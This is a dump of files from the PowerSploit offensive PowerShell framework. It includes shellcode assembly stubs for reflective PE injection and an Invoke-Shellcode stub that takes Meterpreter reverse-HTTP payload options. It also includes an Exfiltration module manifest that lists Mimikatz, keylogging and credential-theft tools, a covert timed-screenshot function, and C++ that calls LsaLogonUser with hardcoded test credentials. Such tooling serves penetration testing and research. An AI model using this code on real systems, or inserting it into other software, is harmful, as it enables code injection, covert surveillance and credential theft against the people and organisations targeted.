2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
 1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.
 2 | 
 3 | Compile:
 4 | x64:
 5 | nasm -f elf64 FileName.asm
 6 | ld -o FileName FileName.o
 7 | objdump -M intel -d FileName
 8 | 
 9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | global _start
 3 | 
 4 | _start:
 5 | 	; Get stack setup
 6 | 	push rbx
 7 | 	mov rbx, rsp
 8 | 	and sp, 0xff00
 9 | 	
10 | 	; Call DllMain
11 | 	mov rcx, 0x4141414141414141	; DLLHandle, set by PowerShell
12 | 	mov rdx, 0x1			; PROCESS_ATTACH
13 | 	mov r8, 0x0			; NULL
14 | 	mov rax, 0x4141414141414141	; Address of DllMain, set by PS
15 | 	call rax
16 | 
17 | 	; Fix stack
18 | 	mov rsp, rbx
19 | 	pop rbx
20 | 	ret
21 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | _start:
 6 | 	; Set a var to 1, let PS known exe is exiting
 7 | 	mov rbx, 0x4141414141414141
 8 | 	mov [rbx], byte 0x01
 9 | 
10 | 	; Call exitthread instead of exitprocess
11 | 	sub rsp, 0xc0
12 | 	and sp, 0xFFf0 ; Needed for stack alignment
13 | 	mov rbx, 0x4141414141414141
14 | 	call rbx
15 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | _start:
 6 | 	; Save state of rbx and stack
 7 | 	push rbx
 8 | 	mov rbx, rsp
 9 | 
10 | 	; Set up stack for function call to GetProcAddress
11 | 	sub rsp, 0x20
12 | 	and sp, 0xffc0
13 | 
14 | 	; Call getprocaddress
15 | 	mov rcx, 0x4141414141414141	; DllHandle, set by PS
16 | 	mov rdx, 0x4141414141414141	; Ptr to FuncName string, set by PS
17 | 	mov rax, 0x4141414141414141	; GetProcAddress address, set by PS
18 | 	call rax
19 | 
20 | 	; Store the result
21 | 	mov rcx, 0x4141414141414141	; Ptr to buffer to save result,set by PS
22 | 	mov [rcx], rax
23 | 
24 | 	; Restore stack
25 | 	mov rsp, rbx
26 | 	pop rbx
27 | 	ret
28 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | _start:
 6 | 	; Save rsp and setup stack for function call
 7 | 	push rbx
 8 | 	mov rbx, rsp
 9 | 	sub rsp, 0x20
10 | 	and sp, 0xffc0
11 | 
12 | 	; Call LoadLibraryA
13 | 	mov rcx, 0x4141414141414141	; Ptr to string of library, set by PS
14 | 	mov rdx, 0x4141414141414141	; Address of LoadLibrary, set by PS
15 | 	call rdx
16 | 
17 | 	mov rdx, 0x4141414141414141	; Ptr to save result, set by PS
18 | 	mov [rdx], rax
19 | 
20 | 	; Fix stack
21 | 	mov rsp, rbx
22 | 	pop rbx
23 | 	ret
24 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | global _start
 3 | 
 4 | _start:
 5 | 	; Get stack setup
 6 | 	push ebx
 7 | 	mov ebx, esp
 8 | 	and esp, 0xfffffff0
 9 | 	
10 | 	; Call DllMain
11 | 	mov ecx, 0x41414141		; DLLHandle, set by PowerShell
12 | 	mov edx, 0x1			; PROCESS_ATTACH
13 | 	mov eax, 0x0			; NULL
14 | 	push eax
15 | 	push edx
16 | 	push ecx
17 | 	mov eax, 0x41414141		; Address of DllMain, set by PS
18 | 	call eax
19 | 
20 | 	; Fix stack
21 | 	mov esp, ebx
22 | 	pop ebx
23 | 	ret
24 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | global _start
 3 | 
 4 | _start:
 5 | 	; Set a var to 1, let PS know the EXE is exiting
 6 | 	mov ebx, 0x41414141
 7 | 	mov [ebx], byte 0x01
 8 | 
 9 | 	; Call exitthread instead of exit process
10 | 	sub esp, 0x20
11 | 	and esp, 0xFFFFFFc0 ; Needed for stack alignment
12 | 	mov ebx, 0x41414141
13 | 	call ebx
14 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | _start:
 6 | 	; Save state of ebx and stack
 7 | 	push ebx
 8 | 	mov ebx, esp
 9 | 	
10 | 	; Align stack
11 | 	and esp, 0xffffffc0
12 | 
13 | 	; Call GetProcAddress
14 | 	mov eax, 0x41414141	; DllHandle, supplied by PS
15 | 	mov ecx, 0x41414141	; Function name, supplied by PS
16 | 	push ecx
17 | 	push eax
18 | 	mov eax, 0x41414141	; GetProcAddress address, supplied by PS
19 | 	call eax
20 | 
21 | 	; Write GetProcAddress return value to an address supplied by PS
22 | 	mov ecx, 0x41414141	; Address supplied by PS
23 | 	mov [ecx], eax
24 | 
25 | 	; Fix stack
26 | 	mov esp, ebx
27 | 	pop ebx
28 | 	ret
29 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-Shellcode.ps1:
--------------------------------------------------------------------------------
 1 | # The actual Invoke-Shellcode has moved to Invoke--Shellcode.ps1.
 2 | # This was done to make a point that you have no security sense
 3 | # if you think it's okay to blindly download/exec code directly
 4 | # from a GitHub repo you don't control. This will undoubedtly break
 5 | # many scripts that have this path hardcoded. If you don't like it,
 6 | # fork PowerSploit and host it yourself.
 7 | 
 8 | function Invoke-Shellcode
 9 | {
10 | 
11 | [CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param (
12 |     [ValidateNotNullOrEmpty()]
13 |     [UInt16]
14 |     $ProcessID,
15 |     
16 |     [Parameter( ParameterSetName = 'RunLocal' )]
17 |     [ValidateNotNullOrEmpty()]
18 |     [Byte[]]
19 |     $Shellcode,
20 |     
21 |     [Parameter( ParameterSetName = 'Metasploit' )]
22 |     [ValidateSet( 'windows/meterpreter/reverse_http',
23 |                   'windows/meterpreter/reverse_https',
24 |                   IgnoreCase = $True )]
25 |     [String]
26 |     $Payload = 'windows/meterpreter/reverse_http',
27 |     
28 |     [Parameter( ParameterSetName = 'ListPayloads' )]
29 |     [Switch]
30 |     $ListMetasploitPayloads,
31 |     
32 |     [Parameter( Mandatory = $True,
33 |                 ParameterSetName = 'Metasploit' )]
34 |     [ValidateNotNullOrEmpty()]
35 |     [String]
36 |     $Lhost = '127.0.0.1',
37 |     
38 |     [Parameter( Mandatory = $True,
39 |                 ParameterSetName = 'Metasploit' )]
40 |     [ValidateRange( 1,65535 )]
41 |     [Int]
42 |     $Lport = 8443,
43 |     
44 |     [Parameter( ParameterSetName = 'Metasploit' )]
45 |     [ValidateNotNull()]
46 |     [String]
47 |     $UserAgent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
48 |     
49 |     [Switch]
50 |     $Force = $False
51 | )
52 | 
53 | throw 'Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.'
54 | }
55 | 


--------------------------------------------------------------------------------
/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module CodeExecution`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module CodeExecution`
 9 | 
10 | For help on each individual command, Get-Help is your friend.
11 | 
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.


--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'Exfiltration.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.0.0.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Company or vendor of this module
16 | CompanyName = ''
17 | 
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 | 
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Exfiltration Module'
23 | 
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 | 
27 | # Format files (.ps1xml) to be loaded when importing this module
28 | FormatsToProcess = 'Get-VaultCredential.ps1xml'
29 | 
30 | # Functions to export from this module
31 | FunctionsToExport = '*'
32 | 
33 | # Cmdlets to export from this module
34 | CmdletsToExport = '*'
35 | 
36 | # Variables to export from this module
37 | VariablesToExport = ''
38 | 
39 | # Aliases to export from this module
40 | AliasesToExport = ''
41 | 
42 | # List of all modules packaged with this module.
43 | ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
44 | 
45 | # List of all files packaged with this module
46 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
47 |            'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
48 |            'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
49 |            'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml'
50 | 
51 | }
52 | 


--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 | 


--------------------------------------------------------------------------------
/Exfiltration/Get-TimedScreenshot.ps1:
--------------------------------------------------------------------------------
  1 | function Get-TimedScreenshot
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 | Takes screenshots at a regular interval and saves them to disk.
  7 | 
  8 | PowerSploit Function: Get-TimedScreenshot
  9 | Author: Chris Campbell (@obscuresec)
 10 | License: BSD 3-Clause
 11 | Required Dependencies: None
 12 | Optional Dependencies: None
 13 |     
 14 | .DESCRIPTION
 15 | 
 16 | A function that takes screenshots and saves them to a folder.
 17 | 
 18 | .PARAMETER Path
 19 | 
 20 | Specifies the folder path.
 21 |     
 22 | .PARAMETER Interval
 23 |     
 24 | Specifies the interval in seconds between taking screenshots.
 25 | 
 26 | .PARAMETER EndTime
 27 | 
 28 | Specifies when the script should stop running in the format HH-MM 
 29 | 
 30 | .EXAMPLE 
 31 | 
 32 | PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 
 33 |  
 34 | .LINK
 35 | 
 36 | http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
 37 | https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1
 38 | #>
 39 | 
 40 |     [CmdletBinding()] Param(
 41 |         [Parameter(Mandatory=$True)]             
 42 |         [ValidateScript({Test-Path -Path $_ })]
 43 |         [String] $Path, 
 44 | 
 45 |         [Parameter(Mandatory=$True)]             
 46 |         [Int32] $Interval,
 47 | 
 48 |         [Parameter(Mandatory=$True)]             
 49 |         [String] $EndTime    
 50 |     )
 51 | 
 52 |     #Define helper function that generates and saves screenshot
 53 |     Function Get-Screenshot {
 54 |        $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
 55 |        $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
 56 |        $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
 57 |        $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
 58 |        $DrawingGraphics.Dispose()
 59 |        $ScreenshotObject.Save($FilePath)
 60 |        $ScreenshotObject.Dispose()
 61 |     }
 62 | 
 63 |     Try {
 64 |             
 65 |         #load required assembly
 66 |         Add-Type -Assembly System.Windows.Forms            
 67 | 
 68 |         Do {
 69 |             #get the current time and build the filename from it
 70 |             $Time = (Get-Date)
 71 |             
 72 |             [String] $FileName = "$($Time.Month)"
 73 |             $FileName += '-'
 74 |             $FileName += "$($Time.Day)" 
 75 |             $FileName += '-'
 76 |             $FileName += "$($Time.Year)"
 77 |             $FileName += '-'
 78 |             $FileName += "$($Time.Hour)"
 79 |             $FileName += '-'
 80 |             $FileName += "$($Time.Minute)"
 81 |             $FileName += '-'
 82 |             $FileName += "$($Time.Second)"
 83 |             $FileName += '.png'
 84 |             
 85 |             #use join-path to add path to filename
 86 |             [String] $FilePath = (Join-Path $Path $FileName)
 87 | 
 88 |             #run screenshot function
 89 |             Get-Screenshot
 90 |                
 91 |             Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
 92 | 
 93 |             Start-Sleep -Seconds $Interval
 94 |         }
 95 | 
 96 |         #note that this will run once regardless if the specified time as passed
 97 |         While ((Get-Date -Format HH:mm) -lt $EndTime)
 98 |     }
 99 | 
100 |     Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}
101 | }
102 | 


--------------------------------------------------------------------------------
/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8" ?>
 2 | <Configuration>
 3 |     <ViewDefinitions>
 4 |         <View>
 5 |             <Name>VaultItemView</Name>
 6 |                 <ViewSelectedBy>
 7 | 		            <TypeName>VAULTCLI.VAULTITEM</TypeName>
 8 | 		        </ViewSelectedBy>
 9 |             <ListControl>
10 |                 <ListEntries>
11 |                     <ListEntry>
12 |                         <ListItems>
13 |                             <ListItem>
14 |                                 <PropertyName>Vault</PropertyName>
15 |                             </ListItem>
16 |                             <ListItem>
17 |                                 <PropertyName>Resource</PropertyName>
18 |                             </ListItem>
19 |                             <ListItem>
20 |                                 <PropertyName>Identity</PropertyName>
21 |                             </ListItem>
22 |                             <ListItem>
23 |                                 <PropertyName>Credential</PropertyName>
24 |                             </ListItem>
25 |                             <ListItem>
26 |                                 <PropertyName>PackageSid</PropertyName>
27 |                             </ListItem>
28 |                             <ListItem>
29 |                                 <PropertyName>LastModified</PropertyName>
30 |                             </ListItem>
31 |                         </ListItems>
32 |                     </ListEntry>
33 |                 </ListEntries>
34 |             </ListControl>
35 |         </View>
36 |     </ViewDefinitions>
37 | </Configuration>
38 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2012
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Debug|x64 = Debug|x64
10 | 		Release|Win32 = Release|Win32
11 | 		Release|x64 = Release|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | 		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | 	EndGlobalSection
23 | 	GlobalSection(SolutionProperties) = preSolution
24 | 		HideSolutionNode = FALSE
25 | 	EndGlobalSection
26 | EndGlobal
27 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp:
--------------------------------------------------------------------------------
  1 | // LogonUser.cpp : Defines the entry point for the console application.
  2 | //
  3 | 
  4 | #include "stdafx.h"
  5 | 
  6 | using namespace std;
  7 | 
  8 | size_t wcsByteLen( const wchar_t* str );
  9 | void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
 10 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
 11 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
 12 | 
 13 | int _tmain(int argc, _TCHAR* argv[])
 14 | {
 15 | 	//Get a handle to LSA
 16 | 	HANDLE hLSA = NULL;
 17 | 	NTSTATUS status = LsaConnectUntrusted(&hLSA);
 18 | 	if (status != 0)
 19 | 	{
 20 | 		cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
 21 | 		return -1;
 22 | 	}
 23 | 	if (hLSA == NULL)
 24 | 	{
 25 | 		cout << "hLSA is NULL, this shouldn't ever happen" << endl;
 26 | 		return -1;
 27 | 	}
 28 | 
 29 | 	//Build LsaLogonUser parameters
 30 | 	LSA_STRING originName = {};
 31 | 	char originNameStr[] = "qpqp";
 32 | 	originName.Buffer = originNameStr;
 33 | 	originName.Length = (USHORT)strlen(originNameStr);
 34 | 	originName.MaximumLength = originName.Length;
 35 | 
 36 | 	ULONG authPackage = 0;
 37 | 	PLSA_STRING authPackageName = new LSA_STRING();
 38 | 	char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
 39 | 	authPackageName->Buffer = authPackageBuf;
 40 | 	authPackageName->Length = (USHORT)strlen(authPackageBuf);
 41 | 	authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
 42 | 	status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
 43 | 	if (status != 0)
 44 | 	{
 45 | 		int winError = LsaNtStatusToWinError(status);
 46 | 		cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError;
 47 | 		return -1;
 48 | 	}
 49 | 
 50 | 	DWORD authBufferSize = 0;
 51 | 	PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
 52 | 		cout << "authBufferSize: " << authBufferSize << endl;
 53 | 
 54 | 	//Get TokenSource
 55 | 	HANDLE hProcess = GetCurrentProcess();//todo
 56 | 	HANDLE procToken = NULL;
 57 | 	BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
 58 | 	if (!success)
 59 | 	{
 60 | 		DWORD errorCode = GetLastError();
 61 | 		cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
 62 | 		return -1;
 63 | 	}
 64 | 
 65 | 	TOKEN_SOURCE tokenSource = {};
 66 | 	DWORD realSize = 0;
 67 | 	success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
 68 | 	if (!success)
 69 | 	{
 70 | 		cout << "Call to GetTokenInformation failed." << endl;
 71 | 		return -1;
 72 | 	}
 73 | 
 74 | 
 75 | 	//Misc
 76 | 	PVOID profileBuffer = NULL;
 77 | 	ULONG profileBufferSize = 0;
 78 | 	LUID loginId;
 79 | 	HANDLE token = NULL;
 80 | 	QUOTA_LIMITS quotaLimits;
 81 | 	NTSTATUS subStatus = 0;
 82 | 
 83 | 	status = LsaLogonUser(hLSA, 
 84 | 		&originName, 
 85 | 		RemoteInteractive, 
 86 | 		authPackage, 
 87 | 		authBuffer,
 88 | 		authBufferSize, 
 89 | 		0, 
 90 | 		&tokenSource, 
 91 | 		&profileBuffer,
 92 | 		&profileBufferSize,
 93 | 		&loginId,
 94 | 		&token,
 95 | 		&quotaLimits,
 96 | 		&subStatus);
 97 | 
 98 | 	if (status != 0)
 99 | 	{
100 | 		NTSTATUS winError = LsaNtStatusToWinError(status);
101 | 		cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
102 | 		return -1;
103 | 	}
104 | 
105 | 	cout << "Success!" << endl;
106 | 
107 | 	return 1;
108 | }
109 | 
110 | //size will be set to the size of the structure created
111 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
112 | {
113 | 	size_t wcharSize = sizeof(wchar_t);
114 | 
115 | 	size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);
116 | 	MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
117 | 	size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON);
118 | 
119 | 	ntlmLogon->MessageType = MsV1_0InteractiveLogon;
120 | 	offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);
121 | 	offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);
122 | 	offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);
123 | 
124 | 	*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
125 | 	return ntlmLogon;
126 | }
127 | 
128 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
129 | {
130 | 	const wchar_t* buffer = str.c_str();
131 | 	size_t size = str.length() * sizeof(wchar_t);
132 | 	uniStr->Length = (USHORT)size;
133 | 	uniStr->MaximumLength = (USHORT)size;
134 | 	uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);
135 | 	memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);
136 | 	return size;
137 | }


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|x64">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>x64</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Release|Win32">
 13 |       <Configuration>Release</Configuration>
 14 |       <Platform>Win32</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>LogonUser</RootNamespace>
 25 |   </PropertyGroup>
 26 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 27 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 28 |     <ConfigurationType>Application</ConfigurationType>
 29 |     <UseDebugLibraries>true</UseDebugLibraries>
 30 |     <PlatformToolset>v110</PlatformToolset>
 31 |     <CharacterSet>Unicode</CharacterSet>
 32 |   </PropertyGroup>
 33 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 34 |     <ConfigurationType>Application</ConfigurationType>
 35 |     <UseDebugLibraries>true</UseDebugLibraries>
 36 |     <PlatformToolset>v110</PlatformToolset>
 37 |     <CharacterSet>Unicode</CharacterSet>
 38 |   </PropertyGroup>
 39 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 40 |     <ConfigurationType>Application</ConfigurationType>
 41 |     <UseDebugLibraries>false</UseDebugLibraries>
 42 |     <PlatformToolset>v110</PlatformToolset>
 43 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 44 |     <CharacterSet>Unicode</CharacterSet>
 45 |   </PropertyGroup>
 46 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 47 |     <ConfigurationType>Application</ConfigurationType>
 48 |     <UseDebugLibraries>false</UseDebugLibraries>
 49 |     <PlatformToolset>v110</PlatformToolset>
 50 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 51 |     <CharacterSet>Unicode</CharacterSet>
 52 |   </PropertyGroup>
 53 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 54 |   <ImportGroup Label="ExtensionSettings">
 55 |   </ImportGroup>
 56 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 57 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 58 |   </ImportGroup>
 59 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
 60 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 63 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 64 |   </ImportGroup>
 65 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <PropertyGroup Label="UserMacros" />
 69 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 70 |     <LinkIncremental>true</LinkIncremental>
 71 |   </PropertyGroup>
 72 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 73 |     <LinkIncremental>true</LinkIncremental>
 74 |   </PropertyGroup>
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 76 |     <LinkIncremental>false</LinkIncremental>
 77 |   </PropertyGroup>
 78 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 79 |     <LinkIncremental>false</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 82 |     <ClCompile>
 83 |       <PrecompiledHeader>Use</PrecompiledHeader>
 84 |       <WarningLevel>Level3</WarningLevel>
